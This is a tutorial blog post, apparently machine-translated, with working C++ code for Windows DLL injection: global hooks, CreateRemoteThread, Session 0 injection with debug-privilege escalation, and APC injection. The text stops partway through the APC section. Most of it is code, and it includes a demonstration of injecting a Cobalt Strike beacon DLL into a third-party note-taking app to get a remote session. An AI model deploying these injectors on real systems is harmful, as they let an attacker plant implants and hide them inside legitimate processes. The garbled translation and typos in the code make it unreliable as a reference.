What is DLL injection

DLL injection is generally the process of inserting/injecting code into a running process. The code we inject is in the form of a dynamically linked library (DLL). DLL files are loaded on demand at run time (similar to a shared object (extension.so) on UNIX systems). In practice, however, we can inject code in many other forms (as is common in malware, arbitrary PE files, shellcode/assemblies, etc.).

Global hook injection

In Windows, most applications are based on the message mechanism. They all have a message process function, which completes different functions according to different messages. Windows intercepts and monitors these messages in the system through the hook mechanism. The local hook is usually used by a thread, while the global hook is usually implemented by a DLL file.

The core function

SetWindowsHookEx

HHOOK WINAPI SetWindowsHookEx (__in int idHook, \ hook type __in HOOKPROC LPFN, \ callback function address __in HINSTANCE hMod, \ Instance handle __in DWORD dwThreadId); \ thread IDCopy the code

Installs the defined hook function into the hook chain by setting the hook type and the address of the callback function. The function returns the hook handle on success, or NULL on failure

Realize the principle of

You can see from the above that if you are creating a global hook, the hook function must be in a DLL. This is because the address space of the process is independent, and the process with the corresponding event cannot call the hook function of the address space of another process. If the hook function implementation code is in a DLL, when the corresponding event occurs, the system will add this DLL to the process address space of the event body, so that it can call the hook function for processing.

After installing the global hook in the operating system, as long as the process receives the message that can issue the hook, the DLL file of the global hook will be automatically or forcibly loaded into the process by the operating system. Therefore, setting global hooks can achieve the purpose of DLL injection. After creating a global hook, the system will load the DLL into the process when the event occurs. In this way, DLL injection is realized.

To be able to inject DLLS into all processes, the program sets the global hook for the WH_GETMESSAGE message. Because hooks of type WH_GETMESSAGE monitor message queues, and Windows is message-driven, all processes have a message queue of their own and load global HOOK DLLS of type WH_GETMESSAGE.

Setting WH_GETMESSAGE can be done with the following code, including a check for success

BOOL SetHook () {g_Hook = :: SetWindowsHookEx ( WH_GETMESSAGE , ( HOOKPROC ) GetMsgProc , g_hDllMoudle , 0 ); if ( g_Hook == NULL ) { return FALSE ; } return TRUE ; }Copy the code

We need to write an implementation of the CallNextHookEx callback function, which uses the CallNextHookEx API. This is mainly the first argument, which passes the current hook handle to the next hook, and intercepts the hook if 0 is passed

LRESULT GetMsgProc (int code, WPARAM WPARAM, LPARAM LPARAM) {return :: CallNextHookEx ( g_Hook , code , wParam , lParam ); }Copy the code

Since we wrote the hook, we use the UnhookWindowsHookEx API to unload the hook if we don’t use it

BOOL UnsetHook () {if (g_Hook) {:: UnhookWindowsHookEx (g_Hook); }}Copy the code

Now that we have the SetWindowsHookEx API, we need to communicate between processes. There are many ways to communicate between processes, such as custom messages, pipes, DLL shared sections, shared memory, and so on

#pragma data_seg("mydata") HHOOK g_hHook = NULL; #pragma data_seg() #pragma comment(linker, "/SECTION:mydata,RWS"Copy the code

The implementation process

Start by creating a NEW DLL

In the PCH. H header file, we declare that these functions we define are all bare functions that balance the stack ourselves

extern "C" _declspec ( dllexport ) int SetHook ();
extern "C" _declspec ( dllexport ) LRESULT GetMsgProc ( int code ,  WPARAM wParam ,  LPARAM lParam );
extern "C" _declspec ( dllexport ) BOOL UnsetHook (); 
Copy the code

Then write three functions inside pch.cpp and create shared memory

#include "pch.h" #include <windows.h> #include <stdio.h> extern HMODULE g_hDllModule; #pragma data_seg("mydata") HHOOK g_hHook = NULL; #pragma data_seg() #pragma comment(linker, "/SECTION:mydata,RWS") LRESULT GetMsgProc (int code, WPARAM wParam , LPARAM lParam ) { return :: CallNextHookEx ( g_hHook , code , wParam , lParam ); } // SetHook BOOL SetHook () {g_hHook = SetWindowsHookEx (WH_GETMESSAGE, (HOOKPROC) GetMsgProc, g_hDllModule, 0); if ( NULL == g_hHook ) { return FALSE ; } return TRUE ; } // Unhook hook BOOL UnsetHook () {if (g_hHook) {UnhookWindowsHookEx (g_hHook); } return TRUE ; }Copy the code

Then set DLL_PROCESS_ATTACH in dllmain. CPP and compile to generate golbal.dll

// dllmain. CPP: Defines entry points for DLL applications. #include "pch.h" HMODULE g_hDllModule = NULL ; BOOL APIENTRY DllMain ( HMODULE hModule , DWORD ul_reason_for_call , LPVOID lpReserved ) { switch ( ul_reason_for_call ) { case DLL_PROCESS_ATTACH : { g_hDllModule = hModule ; break ; } case DLL_THREAD_ATTACH : case DLL_THREAD_DETACH : case DLL_PROCESS_DETACH : break ; } return TRUE ; }Copy the code

Create another console project

Use LoadLibrabryW to load the DLL and generate the golbalInjectDLL.cpp file

// golbalInjectDLL. CPP: This file contains the "main" function. Program execution begins and ends at this point. // #include <iostream> #include <Windows.h> int main () { typedef BOOL ( * typedef_SetGlobalHook )(); typedef BOOL ( * typedef_UnsetGlobalHook )(); HMODULE hDll = NULL ; typedef_SetGlobalHook SetGlobalHook = NULL ; typedef_UnsetGlobalHook UnsetGlobalHook = NULL ; BOOL bRet = FALSE ; do { hDll = :: LoadLibraryW ( TEXT ( "F:\C++\GolbalDll\Debug\GolbalDll.dll" )); if ( NULL == hDll ) { printf ( "LoadLibrary Error[%d]\n" , :: GetLastError ()); break ; } SetGlobalHook = ( typedef_SetGlobalHook ) :: GetProcAddress ( hDll , "SetHook" ); if ( NULL == SetGlobalHook ) { printf ( "GetProcAddress Error[%d]\n" , :: GetLastError ()); break ; } bRet = SetGlobalHook (); if ( bRet ) { printf ( "SetGlobalHook OK.\n" ); } else { printf ( "SetGlobalHook ERROR.\n" ); } system ( "pause" ); UnsetGlobalHook = ( typedef_UnsetGlobalHook ) :: GetProcAddress ( hDll , "UnsetHook" ); if ( NULL == UnsetGlobalHook ) { printf ( "GetProcAddress Error[%d]\n" , :: GetLastError ()); break ; } UnsetGlobalHook (); printf ( "UnsetGlobalHook OK.\n" ); } while ( FALSE ); system ( "pause" ); return 0 ; }Copy the code

Execute to inject golbalDL.dll

Remote thread injection

As the name implies, the remote thread function means that one process creates a thread in another process.

The core function

CreateRemoteThread

HANDLE CreateRemoteThread (
  HANDLE                 hProcess ,
  LPSECURITY_ATTRIBUTES  lpThreadAttributes ,
  SIZE_T                 dwStackSize ,
  LPTHREAD_START_ROUTINE lpStartAddress ,
  LPVOID                 lpParameter ,
  DWORD                  dwCreationFlags ,
  LPDWORD                lpThreadId
); 
Copy the code

LpStartAddress: A pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process. The function must exist in the remote process. For more information, see ThreadProc).

LpParameter: A pointer to A variable to be passed to the thread function.

LpStartAddress is a thread function that uses the address of LoadLibrary as the thread function address. LpParameter is the thread function parameter, using the DLL path as the parameter

VirtualAllocEx

The memory region is reserved or committed in the virtual space of the specified process. Unless the MEM_RESET parameter is specified, the memory region is set to 0.

LPVOID VirtualAllocEx (
  HANDLE hProcess ,
  LPVOID lpAddress ,
  SIZE_T dwSize ,
  DWORD  flAllocationType ,
  DWORD  flProtect
); 
Copy the code

HProcess: handle of the process that applies for memory

LpAddress: memory address of the reserved page. Usually NULL is used for automatic allocation.

DwSize: the size of memory to be allocated, in bytes; Note that the actual allocated memory size is an integer multiple of the page memory size.

flAllocationType

The following values are desirable:

MEM_COMMIT: Allocates physical storage in memory or in a page file on disk for a specific page area

MEM_PHYSICAL: Allocate physical memory (only for address window extension memory)

MEM_RESERVE: reserves the virtual address space of a process without allocating any physical storage. The reserved page can be occupied by continuing to call VirtualAlloc ()

MEM_RESET: indicates that the data in memory specified by the lpAddress and dwSize parameters is invalid

MEM_TOP_DOWN: Allocates memory at the highest possible address (Windows 98 ignores this flag)

MEM_WRITE_WATCH: must be specified with MEM_RESERVE to allow the system to keep track of pages written to the allocated region (Windows 98 only)

flProtect

The following values are desirable:

PAGE_READONLY: This area is read-only. If an application attempts to access a page in a zone, access will be denied

The PAGE_READWRITE area can be read and written by applications

PAGE_EXECUTE: Field contains code that can be executed by the system. Attempts to read or write this area will be rejected.

PAGE_EXECUTE_READ: The region contains executable code that can be read by applications.

PAGE_EXECUTE_READWRITE: Zone contains executable code that applications can read and write.

PAGE_GUARD: a STATUS_GUARD_PAGE exception occurs when the region is accessed for the first time. This flag should be combined with other guard flags to indicate the first access permission of the region

PAGE_NOACCESS: Any access to this area will be rejected

PAGE_NOCACHE: Pages in RAM mapped to this area will not be cached by the microprocessor

Note: The PAGE_GUARD and PAGE_NOCHACHE flags can be combined with other flags to further specify the characteristics of a page. The PAGE_GUARD flag specifies a guard page, that is, when a page is submitted, a one-shot exception is generated for the first time it is accessed, and then the specified access is granted. PAGE_NOCACHE prevents it from being cached by the microprocessor when it maps to a virtual page. This flag makes it easy for device drivers to share chunks of memory using direct memory access (DMA).

WriteProcessMemory

This function can write to a process memory area (writing directly causes an Access Violation error), so the entry area of this function must be accessible; otherwise, the operation will fail.

BOOL WriteProcessMemory (HANDLE hProcess, // Process HANDLE LPVOID lpBaseAddress, // Write the first address of memory LPCVOID lpBuffer, SIZE_T nSize, //x SIZE_T * lpNumberOfBytesWritten);Copy the code

Realize the principle of

Using the CreateRemoteThread API, first take a snapshot with CreateToolhelp32Snapshot to get the PID, then use Openprocess to open the process using VirtualAllocEx

Apply for space remotely, write data using WriteProcessMemory, Then GetProcAddress is used to obtain the address of LoadLibraryW (Because Windows introduced the ASLR security mechanism of base address randomization, so that the system DLL loading base is different each time when starting up, some system DLLS (kernel, NTDLL) loading address, allow each time starting base address Can be changed, but must be fixed after startup, that is, two different processes in each other’s virtual memory, such that the system DLL address is always the same), create threads in the injection process (CreateRemoteThread).

The implementation process

First generate a DLL file, to achieve a simple popover

// dllmain. CPP: Defines entry points for DLL applications. #include "pch.h" BOOL APIENTRY DllMain ( HMODULE hModule , DWORD ul_reason_for_call , LPVOID lpReserved ) { switch ( ul_reason_for_call ) { case DLL_PROCESS_ATTACH : MessageBox ( NULL , L"success!" , L"Congratulation" , MB_OK ); case DLL_THREAD_ATTACH : MessageBox ( NULL , L"success!" , L"Congratulation" , MB_OK ); case DLL_THREAD_DETACH : case DLL_PROCESS_DETACH : break ; } return TRUE ; }Copy the code

To do remote thread injection, we need to get the PROCESS PID. Here we use the CreateToolhelp32Snapshot API to take a snapshot to get the process PID. Note that I have defined #include “ttar.h”

DWORD _GetProcessPID (LPCTSTR lpProcessName) {DWORD Ret = 0; PROCESSENTRY32 p32 ; HANDLE lpSnapshot = :: CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS , 0 ); If (lpSnapshot == INVALID_HANDLE_VALUE) {printf (" Process snapshot failed, please try again! Error:%d" , :: GetLastError ()); return Ret ; } p32 . dwSize = sizeof ( PROCESSENTRY32 ); :: Process32First ( lpSnapshot , & p32 ); do { if ( ! lstrcmp ( p32 . szExeFile , lpProcessName )) { Ret = p32 . th32ProcessID ; break ; } } while ( :: Process32Next ( lpSnapshot , & p32 )); :: CloseHandle ( lpSnapshot ); return Ret ; }Copy the code

Start the process with OpenProcess

hprocess = :: OpenProcess ( PROCESS_ALL_ACCESS , FALSE , _Pid ); 
Copy the code

Then apply for space remotely using VirtualAllocEx

pAllocMemory = :: VirtualAllocEx ( hprocess , NULL , _Size , MEM_COMMIT , PAGE_READWRITE ); 
Copy the code

Then write to memory using WriteProcessMemory

Write = :: WriteProcessMemory ( hprocess , pAllocMemory , DllName , _Size , NULL ); 
Copy the code

The thread is then created and waits for the thread function to end, where the second parameter to WaitForSingleObject must be set to -1

HThread = : CreateRemoteThread (hProcess, NULL, 0, addr, pAllocMemory, 0, NULL); // Wait for the end of the thread function to obtain the exit code WaitForSingleObject (hThread, -1); GetExitCodeThread ( hThread , & DllAddr );Copy the code

The complete code is as follows

// RemoteThreadInject. CPP: This file contains the "main" function. Program execution begins and ends at this point. // #include <iostream> #include <windows.h> #include <TlHelp32.h> #include "tchar.h" char string_inject [] = "F:\C++\Inject\Inject\Debug\Inject.dll" ; DWORD _GetProcessPID (LPCTSTR lpProcessName) {DWORD Ret = 0; PROCESSENTRY32 p32 ; HANDLE lpSnapshot = :: CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS , 0 ); If (lpSnapshot == INVALID_HANDLE_VALUE) {printf (" Process snapshot failed, please try again! Error:%d" , :: GetLastError ()); return Ret ; } p32 . dwSize = sizeof ( PROCESSENTRY32 ); :: Process32First ( lpSnapshot , & p32 ); do { if ( ! lstrcmp ( p32 . szExeFile , lpProcessName )) { Ret = p32 . th32ProcessID ; break ; } } while ( :: Process32Next ( lpSnapshot , & p32 )); :: CloseHandle ( lpSnapshot ); return Ret ; } // Open a process and create a thread for it DWORD _RemoteThreadInject (DWORD _Pid, LPCWSTR DllName) {// Open HANDLE hProcess; HANDLE hThread ; DWORD _Size = 0 ; BOOL Write = 0 ; LPVOID pAllocMemory = NULL ; DWORD DllAddr = 0 ; FARPROC pThread ; hprocess = :: OpenProcess ( PROCESS_ALL_ACCESS , FALSE , _Pid ); //Size = sizeof(string_inject); _Size = ( _tcslen ( DllName ) + 1 ) * sizeof ( TCHAR ); // pAllocMemory = :: VirtualAllocEx (hProcess, NULL, _Size, MEM_COMMIT, PAGE_READWRITE); if ( pAllocMemory == NULL ) { printf ( "VirtualAllocEx - Error!" ); return FALSE ; } // Write = : WriteProcessMemory (hprocess, pAllocMemory, DllName, _Size, NULL); if ( Write == FALSE ) { printf ( "WriteProcessMemory - Error!" ); return FALSE ; } pThread = : GetProcAddress (:: GetModuleHandle (L"kernel32.dll"), "LoadLibraryW"); LPTHREAD_START_ROUTINE addr = ( LPTHREAD_START_ROUTINE ) pThread ; HThread = : CreateRemoteThread (hProcess, NULL, 0, addr, pAllocMemory, 0, NULL); if ( hThread == NULL ) { printf ( "CreateRemoteThread - Error!" ); return FALSE ; 1} // Wait for the end of the thread function to obtain the exit code WaitForSingleObject (hThread, -1); GetExitCodeThread ( hThread , & DllAddr ); // Release DLL space VirtualFreeEx (hprocess, pAllocMemory, _Size, MEM_DECOMMIT); // Close the thread handle :: CloseHandle (hprocess); return TRUE ; } int main () { DWORD PID = _GetProcessPID ( L"test.exe" ); _RemoteThreadInject ( PID , L"F:\C++\Inject\Inject\Debug\Inject.dll" ); }Copy the code

Then a test.exe is generated to do the test

Compile and run with the following results

Break the remote thread injection of Session 0

First, the concept of session0:

The Intel CPU has four privilege levels: RING0,RING1,RING2, and RING3. Windows uses only two levels of RING0 and RING3. RING0 is only used by operating systems, and RING3 is used by anyone. If a normal application attempts to execute a RING0 instruction, Windows displays an “illegal instruction” error message.

Ring0 indicates the CPU running level. Ring0 is the highest level, followed by Ring1, and ring2… In the case of Linux+x86, the operating system (kernel) code runs at the highest run level, Ring0, and can use privileged instructions to control interrupts, modify page tables, access devices, and so on. The application code runs on ring3, the lowest run-time level, and cannot do controlled operations. For example, if you want to access a disk or write a file, you need to execute a system call (function). When executing the system call, the CPU runtime level will change from ring3 to Ring0 and jump to the corresponding kernel code location of the system call. Then the kernel will complete the device access for you. Then return from ring0 to ring3. This process is also known as switching between user and kernel mode.

The original intention of RING design is to separate system permissions from programs, so that the OS can better manage the current system resources, and make the system more stable. Here is the simplest example of RING permissions: A stop-response application running on a ring lower than RING0. You don’t have to worry too much about how to get the system back up and running. In the meantime, you can easily terminate it by launching the task manager, because it runs on a ring lower than RING0 and has higher permissions. It can directly affect the programs running above RING0. Of course, there are advantages and disadvantages. RING ensures the stable operation of the system, but also produces some very troublesome problems. For example, some OS virtualization technologies encounter trouble when dealing with RING instruction RING. The system runs on RING0 instruction RING. However, the virtual OS is also a system, and it also needs permissions matching the system. RING0 does not allow more than one OS to run on it at the same time. The earliest solution was to use a virtual machine and run the OS as a program.

The core function

ZwCreateThreadEx

Note here that the ZwCreateThreadEx function is defined differently in 32-bit and 64-bit

In the 32-bit case

DWORD WINAPI ZwCreateThreadEx (
         PHANDLE ThreadHandle ,
         ACCESS_MASK DesiredAccess ,
         LPVOID ObjectAttributes ,
         HANDLE ProcessHandle ,
         LPTHREAD_START_ROUTINE lpStartAddress ,
         LPVOID lpParameter ,
         BOOL CreateSuspended ,
         DWORD dwStackSize ,
         DWORD dw1 ,
         DWORD dw2 ,
         LPVOID pUnkown ); 
Copy the code

In the 64-bit case

DWORD WINAPI ZwCreateThreadEx (
         PHANDLE ThreadHandle ,
         ACCESS_MASK DesiredAccess ,
         LPVOID ObjectAttributes ,
         HANDLE ProcessHandle ,
         LPTHREAD_START_ROUTINE lpStartAddress ,
         LPVOID lpParameter ,
         ULONG CreateThreadFlags ,
         SIZE_T ZeroBits ,
         SIZE_T StackSize ,
         SIZE_T MaximumStackSize ,
         LPVOID pUnkown ); 
Copy the code

Because we’re going to enter session 0, we’re going to need system privileges, so there’s a couple of other functions that we need to use to lift weights

OpenProcessToken

BOOL OpenProcessToken (__in HANDLE ProcessHandle, __in DWORD DesiredAccess, __out PHANDLE TokenHandle // Return the access token pointer);Copy the code

LookupPrivilegeValueA

BOOL LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, LPCSTR lpName) PLUID lpLuid // to receive the information returned to specify the privilege name);Copy the code

AdjustTokenPrivileges

BOOL AdjustTokenPrivileges (HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, // Pointer to new privileges DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, privileges PreviousState, // Receive the current state of the privilege changed Buffer PDWORD ReturnLength // Receive PreviousState cache size required);Copy the code

Realize the principle of

ZwCreateThreadEx is more low-level than CreateRemoteThread, which is ultimately created by calling ZwCreateThreadEx.

Creating remote threads by calling CreateRemoteThread was perfectly fine before Kernel 6.0 (Windows VISTA, 7, 8, etc.), but session isolation was introduced after kernel 6.0. Instead of running a process immediately after it is created, it suspends the process and decides whether to resume the process after looking at the session layer in which it is running.

On Windows XP, Windows Server 2003, and older versions of Windows, services and applications run using the same Session, which is started by the first user to log on to the console. This Session is called Session 0, as shown below. Before Windows Vista, Session 0 contained not only services but also standard user applications.

Running a service in Session 0 with a user application creates a security risk because the service is running with enhanced privileges, while the user application is running with user privileges (mostly non-administrator users). This allows malware to target a service and “hijack” the service, To achieve the purpose of improving their own level of authority.

Starting with Windows Vista, only services can be hosted in Session 0, and user applications are isolated from services and need to run in subsequent sessions created when the user logs on to the system. For example, the first login user creates Session 1, the second login user creates Session 2, and so on, as shown in the following figure.

The key to the DLL’s failure is the 7th parameter CreateThreadFlags, which will cause the thread to hang after it is created and cannot be restored, causing the injection to fail. To register successfully, change this parameter to 0.

The implementation process

In Win10 system if we want to inject system permission exe, you need to use the debug permission, so first write a weight lifting function.

BOOL EnableDebugPrivilege () {HANDLE hToken; BOOL fOk = FALSE ; if ( OpenProcessToken ( GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES , & hToken )) { TOKEN_PRIVILEGES tp ; tp . PrivilegeCount = 1 ; LookupPrivilegeValue ( NULL , SE_DEBUG_NAME , & tp . Privileges [ 0 ]. Luid ); tp . Privileges [ 0 ]. Attributes = SE_PRIVILEGE_ENABLED ; AdjustTokenPrivileges ( hToken , FALSE , & tp , sizeof ( tp ), NULL , NULL ); fOk = ( GetLastError () == ERROR_SUCCESS ); CloseHandle ( hToken ); } return fOk ; }Copy the code

In the process of DLL injection, MessageBox can not be used, the system program can not display the program form, so here write a ShowError function to get the error code

void ShowError ( const char *  pszText ) 
 {
    char szError [ MAX_PATH ] = { 0 };
    :: wsprintf ( szError , "%s Error[%d]\n" , pszText , :: GetLastError ());
    :: MessageBox ( NULL , szError , "ERROR" , MB_OK );
} 
Copy the code

First open the process to get the handle, using OpenProcess

hProcess = :: OpenProcess ( PROCESS_ALL_ACCESS , FALSE , PID ); 
Copy the code

Then apply the memory address in the injected process, using VirtualAllocEx

pDllAddr = :: VirtualAllocEx ( hProcess , NULL , dwSize , MEM_COMMIT , PAGE_READWRITE ); 
Copy the code

Write to memory using WriteProcessMemory

WriteProcessMemory ( hProcess , pDllAddr , pszDllFileName , dwSize , NULL ) 
Copy the code

Load NTDLL and get LoadLibraryA function address

HMODULE hNtdllDll = :: LoadLibrary ( "ntdll.dll" );

pFuncProcAddr = :: GetProcAddress ( :: GetModuleHandle ( "Kernel32.dll" ), "LoadLibraryA" ); 
Copy the code

Gets the ZwCreateThreadEx function address

typedef_ZwCreateThreadEx ZwCreateThreadEx = ( typedef_ZwCreateThreadEx ) :: GetProcAddress ( hNtdllDll , "ZwCreateThreadEx" ); 
Copy the code

Use ZwCreateThreadEx to create a remote thread for DLL injection

dwStatus = ZwCreateThreadEx ( & hRemoteThread , PROCESS_ALL_ACCESS , NULL , hProcess , ( LPTHREAD_START_ROUTINE ) pFuncProcAddr , pDllAddr , 0 , 0 , 0 , 0 , NULL ); 
Copy the code

One other thing to note here is that ZwCreateThreadEx is not declared in ntDLL. DLL, so we need to use GetProcAddress to get the export address for this function from ntDLl. DLL

Here we add the ZwCreateThreadEx definition, which needs to be defined because the 64-bit and 32-bit structures are different

 #ifdef _WIN64
    typedef DWORD ( WINAPI *  typedef_ZwCreateThreadEx )(
        PHANDLE ThreadHandle ,
        ACCESS_MASK DesiredAccess ,
        LPVOID ObjectAttributes ,
        HANDLE ProcessHandle ,
        LPTHREAD_START_ROUTINE lpStartAddress ,
        LPVOID lpParameter ,
        ULONG CreateThreadFlags ,
        SIZE_T ZeroBits ,
        SIZE_T StackSize ,
        SIZE_T MaximumStackSize ,
        LPVOID pUnkown );
#else
    typedef DWORD ( WINAPI *  typedef_ZwCreateThreadEx )(
        PHANDLE ThreadHandle ,
        ACCESS_MASK DesiredAccess ,
        LPVOID ObjectAttributes ,
        HANDLE ProcessHandle ,
        LPTHREAD_START_ROUTINE lpStartAddress ,
        LPVOID lpParameter ,
        BOOL CreateSuspended ,
        DWORD dwStackSize ,
        DWORD dw1 ,
        DWORD dw2 ,
        LPVOID pUnkown ); 
Copy the code

The complete code is as follows

// session0Inject. CPP: This file contains the "main" function. Program execution begins and ends at this point. // #include <Windows.h> #include <stdio.h> #include <iostream> void ShowError ( const char * pszText ) { char szError [ MAX_PATH ] = { 0 }; :: wsprintf ( szError , "%s Error[%d]\n" , pszText , :: GetLastError ()); :: MessageBox ( NULL , szError , "ERROR" , MB_OK ); } // BOOL EnableDebugPrivilege () {HANDLE hToken; BOOL fOk = FALSE ; if ( OpenProcessToken ( GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES , & hToken )) { TOKEN_PRIVILEGES tp ; tp . PrivilegeCount = 1 ; LookupPrivilegeValue ( NULL , SE_DEBUG_NAME , & tp . Privileges [ 0 ]. Luid ); tp . Privileges [ 0 ]. Attributes = SE_PRIVILEGE_ENABLED ; AdjustTokenPrivileges ( hToken , FALSE , & tp , sizeof ( tp ), NULL , NULL ); fOk = ( GetLastError () == ERROR_SUCCESS ); CloseHandle ( hToken ); } return fOk ; } / / use ZwCreateThreadEx implement far thread injection BOOL ZwCreateThreadExInjectDll (DWORD PID, const char * pszDllFileName ) { HANDLE hProcess = NULL ; SIZE_T dwSize = 0 ; LPVOID pDllAddr = NULL ; FARPROC pFuncProcAddr = NULL ; HANDLE hRemoteThread = NULL ; DWORD dwStatus = 0 ; EnableDebugPrivilege (); HProcess = :: OpenProcess (PROCESS_ALL_ACCESS, FALSE, PID); if ( hProcess == NULL ) { printf ( "OpenProcess - Error! \n\n" ); return - 1 ; DwSize = : lstrlen (pszDllFileName) + 1; pDllAddr = :: VirtualAllocEx ( hProcess , NULL , dwSize , MEM_COMMIT , PAGE_READWRITE ); if ( NULL == pDllAddr ) { ShowError ( "VirtualAllocEx - Error! \n\n" ); return FALSE ; } // Write memory address if (FALSE == :: WriteProcessMemory ( hProcess , pDllAddr , pszDllFileName , dwSize , NULL )) { ShowError ( "WriteProcessMemory - Error! \n\n" ); return FALSE ; } // Load NTDLL HMODULE hNtdllDll = :: LoadLibrary ("ntdll.dll"); if ( NULL == hNtdllDll ) { ShowError ( "LoadLirbary" ); return FALSE ; } pFuncProcAddr = : GetProcAddress (:: GetModuleHandle (" kernel32.dll "), "LoadLibraryA"); if ( NULL == pFuncProcAddr ) { ShowError ( "GetProcAddress_LoadLibraryA - Error! \n\n" ); return FALSE ; } #ifdef _WIN64 typedef DWORD ( WINAPI * typedef_ZwCreateThreadEx )( PHANDLE ThreadHandle , ACCESS_MASK DesiredAccess , LPVOID ObjectAttributes , HANDLE ProcessHandle , LPTHREAD_START_ROUTINE lpStartAddress , LPVOID lpParameter , ULONG CreateThreadFlags , SIZE_T ZeroBits , SIZE_T StackSize , SIZE_T MaximumStackSize , LPVOID pUnkown ); #else typedef DWORD ( WINAPI * typedef_ZwCreateThreadEx )( PHANDLE ThreadHandle , ACCESS_MASK DesiredAccess , LPVOID ObjectAttributes , HANDLE ProcessHandle , LPTHREAD_START_ROUTINE lpStartAddress , LPVOID lpParameter , BOOL CreateSuspended , DWORD dwStackSize , DWORD dw1 , DWORD dw2 , LPVOID pUnkown ); Typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx) :: GetProcAddress ( hNtdllDll , "ZwCreateThreadEx" ); if ( NULL == ZwCreateThreadEx ) { ShowError ( "GetProcAddress_ZwCreateThread - Error! \n\n" ); return FALSE ; DwStatus = ZwCreateThreadEx (&hremoteThread, PROCESS_ALL_ACCESS, NULL, hProcess , ( LPTHREAD_START_ROUTINE ) pFuncProcAddr , pDllAddr , 0 , 0 , 0 , 0 , NULL ); if ( NULL == ZwCreateThreadEx ) { ShowError ( "ZwCreateThreadEx - Error! \n\n" ); return FALSE ; } // Close the handle :: CloseHandle (hProcess); :: FreeLibrary ( hNtdllDll ); return TRUE ; } int main ( int argc , char * argv []) { #ifdef _WIN64 BOOL bRet = ZwCreateThreadExInjectDll ( 4924 , "C:\Users\61408\Desktop\artifact.dll" ); #else BOOL bRet = ZwCreateThreadExInjectDll ( 4924 , "C:\Users\61408\Desktop\artifact.dll" ); #endif if ( FALSE == bRet ) { printf ( "Inject Dll Error! \n\n" ); } printf ( "Inject Dll OK! \n\n" ); return 0 ; }Copy the code

Since messageBox cannot be seen in the process of DLL injection, I choose CS injection for testing. If the injection is successful, it can be online

First generate a 32-bit DLL file, here depends on the number, I chose to inject a 32-bit process, so I choose to generate a 32-bit DLL

Get the path

Here I choose Youdao Cloud note for injection, check the PID

Then change the PID of our function to that of Youdao Cloud

The implementation effect is shown below

The APC injection

An Asynchronous Procedure Call (APC) refers to a function being executed asynchronously in a particular thread. In an operating system, APC is a concurrency mechanism.

Here is a look at the interpretation of asynchronous procedure calls in MSDN

So let’s start with the first function

QueueUserApc: function to add specified asynchronous function calls (callback functions) to the APC queue of the executing thread

APCproc: The function is used to write the callback function.

Adding APC to the thread APC queue generates a soft interrupt. APC functions are executed the next time a thread is scheduled. APC comes in two forms: the APC generated by the system is called kernel-mode APC, and the APC generated by the application is called user-mode APC. Here’s an introduction to the APC of an application. APC inserts a callback function into a thread, but the callback function is called with the APC conditionally, as shown in MSDN

The core function

QueueUserAPC

DWORD QueueUserAPC (
PAPCFUNCpfnAPC , // APC function
HANDLEhThread , // handle to thread
ULONG_PTRdwData // APC function parameter
); 
Copy the code

The first argument to the QueueUserAPC function is the address to which the program jumps to when the APC is executed. The second argument represents the thread handle to be inserted into the APC, requiring that the thread handle contain THREAD_SET_CONTEXT access. The third argument represents the argument passed to the executing function. Similar to remote injection, the DLL injection can be completed if QueueUserAPC’s first argument is LoadLibraryA and the third argument sets the DLL path.

Realize the principle of

In Windows, each thread maintains a thread APC queue, and QucueUserAPC adds an APC function to the APC queue of the specified thread. Each thread has its own APC queue, which records the APC functions that the thread is required to perform. Windows issues a soft interrupt to execute these APC functions, and for APC queues in user mode, these APC functions are executed when the thread is in a warnable state. The APC queue function is executed when a thread enters an alertable state when suspending itself internally with SignalObjectAndWait, SleepEx, WaitForSingleObjectEx, WaitForMultipleObjectsEx, etc.

Generally speaking, the process can be divided into the following steps:

A soft interrupt is generated when a thread in the EXE is executing SleepEx() or WaitForSingleObjectEx(). 2) When the thread is woken up again, it first executes the registered function in the APC queue. The QueueUserAPC() API is used to insert a pointer to a function into the APC queue of a thread during a soft interrupt. If we insert a Loadlibrary() function, we can inject a DLL.

However, there are two conditions for using APC injection:

1. It must be in a multi-threaded environment

2. The injected program must be able to call those synchronization objects

Each thread of each process has its own APC queue, and we can use the QueueUserAPC function to push an APC function into the APC queue. When an APC in user mode is pressed to the thread APC queue, the thread does not execute the pressed APC function immediately. Instead, the thread does not execute the pressed APC function until it is in an alertable state. APC queue function will be executed, the execution order is the same as the ordinary queue, first in first out (FIFO), in the whole execution process, the thread does not have any abnormal behavior, not easy to be detected, but the disadvantage is that there is generally no suspended state for single-threaded programs, so APC injection for this kind of program has no obvious effect.

The implementation process

The general idea here is to write a function that gets the PID based on the process name, and then gets all the thread ids based on the PID. Here I put the two functions together and get the thread of the specified process by typing the PID myself and write it to the array

BOOL GetProcessThreadList (DWORD th32ProcessID, DWORD ** ppThreadIdList, LPDWORD pThreadIdListLength) {DWORD dwThreadIdListLength = 0; DWORD dwThreadIdListMaxCount = 2000 ; LPDWORD pThreadIdList = NULL ; HANDLE hThreadSnap = INVALID_HANDLE_VALUE ; pThreadIdList = ( LPDWORD ) VirtualAlloc ( NULL , dwThreadIdListMaxCount * sizeof ( DWORD ), MEM_COMMIT | MEM_RESERVE , PAGE_READWRITE ); if ( pThreadIdList == NULL ) { return FALSE ; } RtlZeroMemory ( pThreadIdList , dwThreadIdListMaxCount * sizeof ( DWORD )); THREADENTRY32 th32 = { 0 }; HThreadSnap = CreateToolhelp32Snapshot (TH32CS_SNAPTHREAD, th32ProcessID); if ( hThreadSnap == INVALID_HANDLE_VALUE ) { return FALSE ; Th32. DwSize = sizeof (THREADENTRY32); BOOL bRet = Thread32First (hThreadSnap, &th32); BOOL bRet = Thread32First (hThreadSnap, &th32); while ( bRet ) { if ( th32 . th32OwnerProcessID == th32ProcessID ) { if ( dwThreadIdListLength >= dwThreadIdListMaxCount  ) { break ; } pThreadIdList [ dwThreadIdListLength ++ ] = th32 . th32ThreadID ; } bRet = Thread32Next ( hThreadSnap , & th32 ); } * pThreadIdListLength = dwThreadIdListLength ; * ppThreadIdList = 